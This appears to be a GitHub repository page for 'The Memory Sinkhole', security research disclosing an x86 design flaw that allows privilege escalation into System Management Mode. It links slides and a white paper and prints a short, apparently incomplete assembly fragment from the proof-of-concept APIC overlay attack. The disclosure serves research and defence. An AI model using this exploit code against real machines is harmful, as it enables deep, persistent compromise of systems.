Architectural privilege escalation on x86
Switch branches/tags
Nothing to show
Clone or download
#1 Compare This branch is even with Battelle:master.
Latest commit c6427cb Dec 31, 2015
Failed to load latest commit information.
LICENSE update readme Dec 31, 2015 update readme Dec 31, 2015
sinkhole.asm Adjust comments Aug 6, 2015
us-15-Domas-TheMemorySinkhole-wp.pdf Add white paper Aug 12, 2015
us-15-Domas-TheMemorySinkhole.pdf Fix typo Aug 12, 2015

The Memory Sinkhole

: An x86 design flaw allowing ring -2 privilege escalation.


The memory sinkhole is a design flaw in x86 processors that allows code to escalate privileges into ring -2 (System Management Mode).

mov dword [0x10014], 0xffcf9aff
mov dword [0x10010], 0x9fa2ffff

mov eax, 0x1f5ff900
mov edx, 0
mov ecx, 0x1b

jmp $

The proof of concept APIC overlay attack illustrates one approach for using the flaw to elevate privileges.


The technique is outlined in detail in the Black Hat presentation.

Slides from the presentation are provided here.

The exploit white paper provides a technical overview of the flaw and exploitation approach.


The Memory Sinkhole is a research effort from Christopher Domas (@xoreaxeaxeax).